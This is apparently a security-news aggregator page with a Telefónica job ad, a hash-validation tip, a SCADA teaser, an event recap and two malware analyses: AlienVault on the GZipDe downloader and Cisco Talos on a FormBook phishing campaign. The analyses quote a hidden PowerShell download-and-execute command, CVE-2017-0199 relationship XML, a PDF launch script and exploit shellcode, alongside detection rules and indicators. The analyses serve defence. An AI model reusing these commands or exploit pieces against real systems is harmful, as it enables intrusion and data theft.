Security Posts

ElevenPaths Professional Services: 40 puestos de trabajo disponibles

Hace ya un tiempo, dentro de Telefónica se creó el grupo de ElevenPaths Professional Services. Una unidad que es parte del crecimiento que están teniendo lo servicios de ciberseguridad en el grupo. Actualmente, en esa unidad buscamos más de 40 profesionales, y si tu perfil coincide con alguno de los siguientes, o piensas que puedes aportar a nuestro equipo, contacta con nosotros.

Figura 1: ElevenPaths Professional Services: 40 puestos de trabajo disponibles
Consultor LOPD/GDPR
Buscamos expertos en LOPD y RGPD con experiencia mínima de 3 a 5 años en proyectos de implantación/auditoría LOPD, RGPD para incorporar al equipo de consultoría y realizar proyectos en nuestros clientes. Se valorará conocimientos en ISO 27001, Esquema Nacional de Seguridad, análisis y gestión de riesgos, formación y concienciación y un nivel alto de inglés.Consultores de Normativa.
Buscamos profesionales con experiencia del al menos 5 años ejecutando proyectos de Plan Director de Seguridad, assessment de seguridad, análisis de riesgos, continuidad de negocio y normativa de seguridad de la información. Nivel alto de inglés.Consultores
Buscamos consultores con más de 5 años de experiencia en proyectos de adecuación y auditoría normativos (ISO 27001, ISO20000, PCI-DSS, ENS, CSA Star, etc...) para ejecutar proyectos en nuestros clientes. Valoraremos muy positivamente que dispongas de background técnico en administración de sistemas y/o comunicaciones, capacidad de interlocución con clientes, dirección, departamentos técnicos y de negocio. Además, si dispones de certificaciones, muchísimo mejor.Consultores Técnicos de Proyectos de Seguridad
Si te interesa realizar hardening, los proyectos de Gestión de Identidad, implantar un sistema que prevenga la fuga de información o analizar y diseñar arquitecturas de Seguridad a nivel global (Monitorización, Cloud, GI, Seguridad de Red, etcétera) y tienes un buen nivel de inglés, estamos deseando trabajar juntos.Managers y Jefes de Proyecto de Seguridad
Buscamos Security managers y project managers con experiencia probada de al menos 3 años en puesto similar.Arquitectos de redes
Buscamos Arquitectos con experiencia en proyectos de revisión de redes para su securización y/o propuestas de cambios y mejoras, diseño de arquitectura, despliegue, defensa y soporte de sistemas de seguridad en grandes redes de comunicaciones, conocimiento técnico de la seguridad en bases de datos, sistemas operativos, sistemas de seguridad, y tecnologías de red, herramientas de supervisión de sistemas…Técnicos de Seguridad
Si tienes un perfil técnico con conocimiento de gestión de equipos de seguridad de las principales marcas (Checkpoint, Paloalto, Fortinet…) y con conocimiento de las diversas tecnologías de seguridad del mercado (proxys en la nube, IPS, IDS, antivirus…), estamos deseando que trabajes con nosotros.Analistas Ciber
Buscamos analistas técnicos de ciberseguridad y analistas de inteligencia con experiencia de más de 2 años en puestos similares. Valorable buen nivel de inglésIoT Security Technical Product Manager
Buscamos Product manager de seguridad para IoT con al menos 3 años de experiencia en desarrollo de productos de seguridad, en tecnologías IoT (IoT technology stack: devices, connectivity, platforms, analytics and Security) y en los principales IoT Security frameworks (GSMA, ENISA…).Consultor@ Senior en Seguridad con Ingles fluido
Buscamos consultores con conocimientos del mercado mayorista y de Telecomunicaciones, marketing de producto, arquitectura de sistemas y arquitectura de seguridad, elaboración de procesos y procedimientos dentro de un SOC, RFP(elaboración y respuesta). Experiencia superior a 5 años en puesto similar.Becas y Prácticas de verano
También, si te interesa, durante este verano o compaginando tus estudios, puedes acceder a alguna de nuestras becas o aplicar a alguna de nuestras prácticas de verano en proyectos de seguridad informática.Si estás interesado en alguno de estos puestos o quieres recibir más información escríbenos a tis.vacantes@telefonica.com.

Autor: Departamento de RRHH de TIS
Sigue Un informático en el lado del mal - Google+ RSS 0xWord
Categories: Security Posts

Validating Your Downloads

Didier Stevens - 6 hours 51 min ago
Occasionally, a comment is posted on my blog to report that the posted hash of a file doesn’t match the hash of the downloaded file. Often, it’s because the reader calculated the hash of my program, and not the hash of the downloaded ZIP file, containing the program. Let’s clarify this. Here is an example of download details I use in my blog posts: hash_V0_0_5.zip (https)
MD5: 2A4D61F692D935E27E4BECA642F19D97
SHA256: 5DA5B59EBC6EB0FADEA868E631057BF14C29486405F75D8183C48FE4631B81A2 First you have the HTTP download link to the file, and then you have the HTTPS download link of the same file. Next, you have the MD5 hash and SHA256 hash of the hosted file, e.g. the ZIP file. The links and hashes are served by one host (blog.didierstevens.com), and the file is served by another host (didierstevens.com). To validate that the file you downloaded has not been tampered with, or corrupted during the download, you have to calculate the hash of the downloaded file (if it’s a ZIP file, calculate the hash of the ZIP file, not of the archived files) and compare this with the hash I published. If you don’t have a tool to do this, you can use my hash.py tool like this:
Categories: Security Posts

GZipDe: An Encrypted Downloader Serving Metasploit

AlienVault Blogs - Wed, 2018/06/20 - 18:44
At the end of May a Middle Eastern news network published an article about the next Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the area. It uses a piece of text taken from the report as a decoy: This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection. Malicious Document The file, which was uploaded to VirusTotal by a user in Afghanistan, contains macro malware embedded in a MS Office Word document (.doc).  When opened, it executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden Powershell console: 'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F Leveraging an HTTP request, it resolves to the following URL: http://118.193.251[.]137/dropbox/?p=BT67HU78HZ We are missing the next step of the infection chain as the server is now offline. Based on the common path we believe this file is related, and may be part of the later infection steps: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe. GZipDe - The Encrypted Downloader The internal name of this malware is Gzipde, as specified by the path it was built on the attacker’s machine: \Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb We found the original reverse-tcp payload publicly available on GitHub, although the attacker added an additional layer of encryption payload to that version. It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection. The key is described as an array of bytes, with the values: After decompression, it passes through a decryptor. The encryption method used is RC4 with a key length of 23 bytes. The malware allocates a new memory page with execute, read and write privileges. Then it copies the contents of the decrypted payload and launches a new thread to execute it. The script uses WaitForSingleObject C# class, meaning that the program accesses a mutex object. A special handler controls the access of the process to system resources. This prevents multiple instances of the same malware to run at a time, unnecessarily increasing resource  usage and producing more network noise. The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn’t up, Shodan recorded it serving a Metasploit payload: Metasploit is becoming a popular choice with targeted attacks. The Metasploit payload The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload - a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands. This shellcode loads the entire DLL into memory, so it’s able to operate while writing no information into the disk. This operation is called Reflective DLL injection. From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network. Thanks to Chris Doman and Jaime Blasco for collaboration. Appendix File-Hashes https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28
https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c
https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711
  IP Addresses 118.193.251[.]137 175.194.42[.]8 URLs http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe http://118.193.251[.]137/dropbox/?p=BT67HU78HZ Network Detection Multi-purpose: AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo) ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate Dedicated: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"^/\/dropbox\/\?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;) alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;) Unified Security Management (USM) Correlation Rules
  • System Compromise - Code Execution - Powershell Process Created by Office Word
  • Delivery & Attack - Suspicious Download - File Download via Office Macro
  • Environmental Awareness - Code Execution - Suspicious PowerShell Arguments
OTX Pulse Yara Rule rule gzipde_hunt { meta: author = "AlienVault Labs" description = "Hunt rule to identify files related to Gzipde" copyright = "Alienvault Inc. 2018" reference = "https://otx.alienvault.com/pulse/5b239254174e5d5edab34e05" strings: $a = "118.193.251.137" nocase wide ascii $b = "BT67HU78HZ" nocase wide ascii $c = "2E0EB747-BE46-441A-A8B1-97AB27B49EC5" nocase wide ascii $d = "gzipde.pdb" nocase wide ascii $e = "C:\\Users\\jhon\\Documents\\Visual Studio 2008" nocase wide ascii condition: any of them } import "dotnet" rule MeterpreterEncryptedPayloadDotNetGzipDE { meta: type = "malware" description = "GZipDe" author = "jblasco@alienvault.com" reference1 = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp/blob/master/NativePayload_Reverse_tcp.cs" reference2= "https://otx.alienvault.com/indicator/file/33c03d94f75698fac6a39a5a6c328c2be4a079717520e0ec411597b9ca3a9bef" strings: $pdb = "gzipde.pdb" $st1 = "PAGE_EXECUTE_READWRITE" $st2 = "EncryptInitalize" $st3 = "EncryptOutput" $st4 = "CreateThread" $st5 = "VirtualAlloc" condition: uint16(0) == 0x5A4D and ((dotnet.typelib == "c1181bc0-0102-44e9-82ba-7c1ca7d24219" and dotnet.guids[0] == "2e0eb747-be46-441a-a8b1-97ab27b49ec5") or $pdb or (dotnet.number_of_modulerefs == 1 and dotnet.modulerefs[0] == "kernel32" and all of ($st*))) }
Categories: Security Posts

SCADA Hacking – Industrial Systems Woefully Insecure

Darknet - The Darkside - Wed, 2018/06/20 - 17:37
It seems like SCADA hacking is still a topic in hacker conferences, and it should be with SCADA systems still driving power stations, manufacturing plants, refineries and all kinds of other powerful and dangerous things. The latest talk given on the subject shows with just 4 lines of code and a small hardware drop device a SCADA based facility can be effectively DoSed by sending repeated shutdown commands to suscpetible systems. Read the rest of SCADA Hacking – Industrial Systems Woefully Insecure now! Only available at Darknet.
Categories: Security Posts

My Little FormBook

Cisco Talos - Wed, 2018/06/20 - 17:00
This blog post is authored by Warren Mercer and Paul Rascagneres.

Summary
Cisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as "malware as a service." This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots.



The author put a lot of effort in the infection vector using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and Microsoft Office document) and used two public Microsoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in order to drop the final payload on the targeted system. The final payload was downloaded during the campaign from a small Japanese file-sharing platform. The platform owner has since deleted the malicious payload binaries from their system. Here is the infection workflow:

We identified an infrastructure overlap between this campaign and a previous campaign we published in February 2017 relating to Pony malware which utilized Microsoft Publisher files to deliver its payload. There is the potential that the same actor behind these two attacks is the same due to an overlap in the two attacks' infrastructure. If that is the case, the actor could switch between Pony and FormBook to be able to continue their malicious activities for more than a year.

Infection Vector
Phishing Campaign
This campaign starts with a malicious email containing two attachments. Here is a snippet of the email:

The email pretends to be an order sent from the sales department of a company located in Spain. The website's details and phone number appear to have been copied from that of a genuine company.

The email contains two attachments:

  • A blank malicious Microsoft Office document template file. (.dotm)
  • A malicious PDF document that is also blank. (.pdf)
First Office MalDoc (Attached)
The email contains two attachments as mentioned. One of these is a Microsoft Office document template file. This file type is normally used to share templates. The 'normal.dotm' file is the default Microsoft Word template that opens when Word is launched. The attacker, however, does not use the .dotm file format to share templates, but rather to download an additional Office document.

If an example document from the campaign, named "STMORDER-442799.dotm," is opened, it appears blank. However, like most Office documents, if the file is unzipped and opened, you can access the attributes and XML information. This is where the attacker leverages CVE-2017-0199 to trigger an external download by abusing the relationship elements within "STMORDER-442799\word\_rels\document.xml.rels." Despite the file appearing to be blank, it does contain a large amount of XML information. We see the <Relationship> elements being abused:
<Relationship Id="_id_2970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc"/></Relationships>
This will cause the following document to be downloaded and executed from a Japanese file-hosting platform.

At the time of publishing, this file is no longer available and trying to view it results in a 404 error. The platform maintainer of PyonPyon.moe provides a list of malware that has been removed from the hosting platform — this can be found here. Within this data, we can identify our attempted download of the .doc file, among others related to this campaign, which were removed on the same day, June 8:
We were able to obtain multiple .doc files in relation to this campaign, which we will discuss later on. These .doc files are in rich text format (RTF), which leveraged CVE-2017-11882.

PDF document (Attached)
Also, attached to the initial email is a PDF file which contains a JavaScript object:
this.exportDataObject({ cName: "mine001.dotm", nLaunch: 2 });
This code launches a file embedded within the PDF document. In our case, the file is an Office document named "mine001.dotm."

Second Office MalDoc (Embedded)
The embedded Office document is exactly the same as the attached document discussed above. We don't know why the author of this campaign puts the same file in two seperate locations, or if it's on purpose or a mistake made during the phishing generation stage. It's possible the actor did not intend to attach both the DOTM and the PDF.

Third Office MalDoc (Downloaded)
The final malicious Office document is an RTF document. This RTF document contains an object linking and embedding (OLE) stream at the offset 0x9F (header d0 cf 11 e0 a1 b1 1a e1):
00000040 36 39 30 36 64 30 34 33 30 32 30 30 30 30 30 30 |6906d04302000000|
00000050 31 37 30 30 30 30 30 30 37 32 34 37 35 35 33 30 |1700000072475530|
00000060 33 32 37 37 34 65 37 35 36 64 37 36 33 36 34 66 |32774e756d76364f|
00000070 35 30 36 66 36 32 34 62 37 34 35 38 34 37 33 32 |506f624b74584732|
00000080 37 36 35 31 30 30 30 30 30 30 30 30 30 30 30 30 |7651000000000000|
00000090 30 30 30 30 30 30 30 30 31 30 30 30 30 30 64 30 |00000000100000d0|
000000a0 63 66 31 31 65 30 61 31 62 31 31 61 65 31 30 30 |cf11e0a1b11ae100|
000000b0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
000000c0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 65 |000000000000003e|
000000d0 30 30 30 33 30 30 66 65 66 66 30 39 30 30 30 36 |000300feff090006|
000000e0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
000000f0 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 |0000000100000001|
00000100 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
We have the beginning of the OLE compound file (CF) — named OLECF — object.

This OLECF object contains a compound file binary format (CFBF) object.This file format is described here. This object is linked to the COM object "0002ce02–0000–0000-c000–000000000046":
00000400 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 |R.o.o.t. .E.n.t.|
00000410 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 |r.y.............|
00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000440 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00 |................|
00000450 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
00000460 00 00 00 00 00 00 00 00 00 00 00 00 d0 e9 36 77 |..............6w|
00000470 7f fc d3 01 03 00 00 00 c0 07 00 00 00 00 00 00 |................|
00000480 01 00 4f 00 6c 00 65 00 31 00 30 00 4e 00 61 00 |..O.l.e.1.0.N.a.|
00000490 74 00 69 00 76 00 65 00 00 00 00 00 00 00 00 00 |t.i.v.e.........|
000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
This CLSID is the ID of the Equation Editor as mentioned by Microsoft. Finally, here is where and how the exploit is executed:
00000800 98 07 00 00 03 d4 01 6a 72 0a 01 08 7f a9 b8 c3 |.......jr.......|
00000810 42 ba ff f7 d0 8b 38 8b 37 bd c6 98 b9 ff f7 d5 |B.....8.7.......|
00000820 8b 4d 77 56 ff d1 05 63 d6 2d 0b 2d 4d d5 2d 0b |.MwV...c.-.-M.-.|
00000830 ff e0 fa d3 6e 4a c9 6a 83 53 e8 d1 41 00 1e b6 |....nJ.j.S..A...|
00000840 29 1d e6 71 de 92 60 23 40 9d 40 0e 7a d8 9a d6 |)..q..`#@.@.z...|
00000850 26 43 86 98 e0 c4 4e b8 1d 7d 82 46 ce 45 07 be |&C....N..}.F.E..|
00000860 82 15 f0 31 ec 1e 49 93 a2 d4 ef b5 da ae e8 39 |...1..I........9|
00000870 ff d3 ab 65 88 29 2b 4e be b9 ec 16 e5 7f ab d6 |...e.)+N........|
00000880 08 a7 ec 69 51 38 1f 97 27 27 7d f9 f3 f2 65 83 |...iQ8..''}...e.|
The red value is the stream length.

The blue value is equation editor MTEF header starting by 0x3.

The green value is the font record starting by 0x8. This vulnerability is an overflow on the front name located in grey in the snippet above. The overflow will redirect the flow in order to execute the RET code at the address 0x0041d1e8 (in pink).

Finally, a shellcode is executed.

Here is the first stage of the shellcode:
user@laptop:$ rasm2 -d B8C342BAFFF7D08B388B37BDC698B9FFF7D58B4D7756FFD10563D62D0B2D4DD52D0BFFE0
mov eax, 0xffba42c3
not eax
mov edi, dword [eax]
mov esi, dword [edi]
mov ebp, 0xffb998c6
not ebp
mov ecx, dword [ebp + 0x77]
push esi
call ecx
add eax, 0xb2dd663
sub eax, 0xb2dd54d
jmp eax
The purpose is to execute GlobalLock() (first call) and to finally jump in the second stage of the shellcode in bold orange in the hexadecimal code.

The purpose is to download and execute a binary located on a compromised WordPress website (hxxp://irishlebanese[.]com/wp-admin/images/eight/mine001.exe).


Final payload: FormBook
The final payload is located on a compromised WordPress website (hxxp://irishlebanese[.]com/). The malware author stored many PE32 files on this server, some of which are still available. We have included more than 30 hashes of files stored on this server in the IOCs section. The most recent samples are FormBook samples.

FormBook is an inexpensive stealer available as "malware as a service." It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots. This post does not describe the malware in-depth, since there are excellent posts on the malware written by other researchers.

Overlaps with previous campaigns
In February 2017, we published an article about another stealer using Publisher and a public exploit to compromise systems. We found three interesting samples related to this case and our current FormBook case:

  • 5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 (located at hxxp://irishlebanese[.]com/wp-admin/admin/dor001.exe in May 2018)
  • 82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)
  • 8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)


These three samples use the same FormBook infrastructure and the Pony infrastructure mentioned in our previous article:

  • hxxp://alphastand[.]top/alien/fre.php -> command and control (C2) server from 2017
  • hxxp://ukonlinejfk[.]ru/mine/fre.php
  • hxxp://alphastand[.]trade/alien/fre.php -> C2 server from 2017
  • hxxp://igtckeep[.]com/dor/fre.php
  • hxxp://alphastand[.]win/alien/fre.php -> C2 server from 2017
  • hxxp://kbfvzoboss[.]bid/alien/fre.php -> C2 server from 2017
  • hxxp://www.cretezzy[.]com/do/ -> FormBook C2 server
  • hxxp://www.beemptty[.]com/se/ -> FormBook C2 server


The infrastructure sharing suggests that this is a common actor currently using two different stealers. Based on the timeline, we assume that the actor is currently moving from Pony to FormBook, another stealer.

Conclusion
This case shows us that malicious actors play with multiple file formats and embedded objects. In this campaign, the author used a PDF with an embedded Office document template using a vulnerability in order to download an additional Office RTF document, and then a second vulnerability and exploit in order to compromise the target. The attacker used an unfamiliar file-sharing platform in order to store the malicious document and a compromised WordPress site in order to store the final payload. We did notice that the file-sharing platform is reactive, removing the malicious files quickly, stopping the infection chain.

Some technical elements, such as infrastructure sharing, show us that the actor behind this campaign is probably the same actor behind a campaign we described one year ago. Last month it used two stealers in parallel on the same infrastructure. Based on the information we have today, he/she no longer uses Pony, but switched to FormBook in order to steal information on compromised systems.

Coverage
Additional ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCsPDF8f859c1a9965427848315e9456237e9c018b487e3bd1d632bce2acd0c370341e
Embedded And Attached dotm04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c
Malicious Document Hosted On The Files Sharing Platform4c16046966a5fd06c84213aa67bfa37949800980915e9b511384ec17dc7eb7b1 -> hxxps://pomf[.]pyonpyon[.]moe/pajelx.doc
04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c -> hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc
59cf77148cbbf24d395d09192ce43ac5395087f3e499cda350e3a93f13e37de1 -> hxxps://pomf[.]pyonpyon[.]moe/btgppc.doc
D83f874dda2fa3e4339399c786e9497c1b440019fa5ee5925738fc3afa67352c -> hxxps://pomf[.]pyonpyon[.]moe/ejmhsu.doc
35ea3d8272751d60bd3106e548444588b1959622dfdcf11be14b80786bdb25e6 -> hxxps://pomf[.]pyonpyon[.]moe/cnlvop.doc
5e9979a9676889a6656cbfa9ddc1aab2fa4b301155f5b55377a74257c9f9f583 -> hxxps://pomf[.]pyonpyon[.]moe/hbhjks.doc
0b0615eb8e4c91983fab37475ecc374f79c394768a33ea68c2208da1c03e5a43 -> hxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc
Fccc874f4f741231673f5a3c0bdc4c6bfd07f1b1e93f7c64e2015c393966216e -> hxxps://pomf[.]pyonpyon[.]moe/neitsj.doc
13ce56581c8ad851fc44ad6c6789829e7c250b2c8af465c4a163b9a28c9b8a41 -> hxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc
541ea322a3a6385211566f95cef333580a62341dac397e044a04504625acdd0d -> hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc
062ae7152d8e8f3abb093e55c5a90213134dd278ac28cfeb18e81132232dcbe8 -> hxxps://pomf[.]pyonpyon[.]moe/tewkco.doc
0ddf7e87957932650679c99ff2e2380e2be8a203d1142f19a22ad602047f372e -> hxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc
1debc4e22a40f4f87142e7e40094ce1a9aa10462f0c6d1c29aa272d7d6849205 -> hxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc

PE32 Hosted On The irishlebanese Website
d7f0f3fea2f9935c1dd7bda343ec1e3fb77457e68b16b9d51516a3d8c651d14f
05a945fc7a9eb4c9a4db8eb974333b3938c06d9299976075b2fc00a79cf0a129
91a471ba534219f05c31d204b3c5217cde7c67f70600aa3abba334888f628376
f7e97000615ee77093c4ec49f3cbe4b8cb3dc6feafc74ae8d59f01f05dc4280e
23c40f55797b07b2d9bf1e314ea928b1151af2b2e605aa520a715fe56e481528
1d706a3c85973fe96240a254abff52c0593b4aa0c283d3ecc28df6f8baed853b
e8f0136abc46b668d44586a6b5a394b470af6af8e9d91bddca4b70e3e66768d1
958ee876ebaab71ea2ef9fcda6a08598319578ccc1f4bd9baa3a54114b88abdc
b031075b8ad2558ee3ee7f0749c2b24484dd6fab7252fad71548276514b9b766
667cc420816fd71ae54869b4c0f05129cc5972dbc47f7a98776fc63a72d77691
7db8273fd25088900cffa036eb631ffcee40302dd7b33a7d4f3e653e7ab091c0
3efdc8b15e324cd9323cdbd34fbd19979d6eeb95fe1120ed3a95dc24fab67397
189e2494b19773f9b72072774891378f5809c7bfb121dcba2cee13e6f91ed619
bd44861de18d5bbf71d2d64e29ff9f1d8495f97f5ba0b49eacb504b3768a89bb
e0282f51ac3bfba5774893c8b70c31600d7e4bd7f6d7231fd33315396cd18b78
83fa11d8711ef22437681e09a4be500cfaf49ac7cb29837ff6a42fb46b09d789
14ce215b561dc43104e400c0eb877d876f6e9be77c5b2994b9b8745b2132d914
226d38382415b935d849539c0b6305a4259c26dfa7317b944f8498cd3e65850f
dd1eeb128b1d1eb40e74281aec79828d7d7179a0375bda5e85ce5fd2fac064a2
a7422eddb437a33d730ab70bd1267d815fc3761d5eda9781de91d0bdeeb823ff
2a21f728282b33b89e6cbd99db52651931b534be9837d99eacf87cfd748c3cba
91b6219f4a8903773492fd83fe02e6aa8729e378f559c5cc9f115a2304f89e57
4f73923c23354ac5050f012f607342362eaf1d691ce1b64ea1e831038cc4236c
ebbed2fcd7fe4dc8a95cc60ab9c8e98609bcf3ba5696507252c65cc6be748b14
d1f9549943b936ba54d87a5befd2d241fcddac6f0caf8c786f6034ab18b8e61d
ae7cacc7a16cb48cb40473ad0269331c392f8eb0fef8ebe2d90f3592fccb306c
00cb817330768b33a30bcf7a6a67d0269aa32f8099aee3ecd18da0e31d096610
e93994bf78b13d3bdee1682faf6c6544246fbd6d95a0aa043ac175ad0b905646
822c1239203db0bfdde3d0b65f50e53f7ee155638d4743b14f58267fa3e76531
5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825
8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72
82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794

C2 Servershxxp://www[.]drylipc[.]com/em1/
hxxp://www[.]handanzhize[.]info/d5/
hxxp://www[.]bddxpso[.]info/d7/
hxxp://www[.]newraxz[.]com/as/
hxxp://www[.]atopgixn[.]info/de8/
hxxp://www[.]cretezzy[.]com/am/
hxxp://www[.]casiinoeuros[.]info/d3/
hxxp://www[.]newraxz[.]com/as/
hxxp://www[.]cretezzy[.]com/do/
hxxp://www[.]newraxz[.]com/as/
Overlaps Samples5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825
hxxp://alphastand[.]top/alien/fre.php
hxxp://alphastand[.]trade/alien/fre.php
hxxp://igtckeep[.]com/dor/fre.php
hxxp://alphastand[.]win/alien/fre.php
hxxp://kbfvzoboss[.]bid/alien/fre.php
hxxp://www[.]cretezzy[.]com/do/

8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72
hxxp://ukonlinejfk[.]ru/mine/fre.php
hxxp://alphastand[.]top/alien/fre.php
hxxp://alphastand[.]trade/alien/fre.php
hxxp://alphastand[.]win/alien/fre.php
hxxp://kbfvzoboss[.]bid/alien/fre.php
hxxp://www[.]beemptty[.]com/se/

82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 hxxp://ukonlinejfk[.]ru/mine/fre.php
hxxp://alphastand[.]top/alien/fre.php
hxxp://alphastand[.]trade/alien/fre.php
hxxp://alphastand[.]win/alien/fre.php
hxxp://kbfvzoboss[.]bid/alien/fre.php
hxxp://www[.]beemptty[.]com/se/
Categories: Security Posts

Network Innovation Day 2018: Conferencias en vídeo disponibles online #NID2018

Un informático en el lado del mal - Wed, 2018/06/20 - 15:44
El pasado 14 de Junio nos paramos en Telefónica para hablar de nuestros trabajos en la red durante la celebración del Network Innovation Day. Hablamos de lo que hacemos con BigData, con Seguridad Informática, con Machine Learning o Quantum Computing durante una mañana, para explicar a nuestros clientes nuestros "internals" con las Self Organized Networks, con Software Defined Networks o Network Function Virtualization.

Figura 1: Network Innovation Day 2018: Conferencias en vídeo disponibles online #NID2018
Durante ese día hablaron los responsables de muchas de nuestras áreas tecnológicas de la casa, como Guillermo Ansaldo, Enrique Blanco, David del Val, Francisco Montalvo, Pedro Pablo Pérez o nuestro consejero Ignacio Cirac, que dio una charla muy especial del proyecto de cifrado de comunicaciones en red utilizando Quantum Computing.

Figura 3: Network Innovation Day 2018 Full Event
Ahora los vídeos, junto con todas las presentaciones, las tienes disponibles online. En la web del Network Innovation Day 2018 puedes ir siguiendo la agenda y descargando las presentaciones, al tiempo que ver la sesión que más te interese.
Hoy, con el gran Ignacio Cirac, que además de ser un científico único es mejor persona.A post shared by Chema Alonso (@chemaalonso) on Jun 14, 2018 at 1:49am PDT
Con mi compañero, el gran Enrique Blanco cerrando nuestro evento de Network Innovation Day. Enrique es nuestro Global CTIO, responsable de la red de Telefónica y sus sistemas. Él es quien me cuida y me llama becario. Admiración hacía él.A post shared by Chema Alonso (@chemaalonso) on Jun 14, 2018 at 9:21am PDT
Fue un día muy especial, así que yo aproveché para hacerme fotos con muchos de los otros ponentes y amigos, ya que se dan pocas citas así, en las que nos pongamos todos en frente de nuestros clientes para hablar de cosas que nos gustan tanto. Estos son días de alegría para todos.
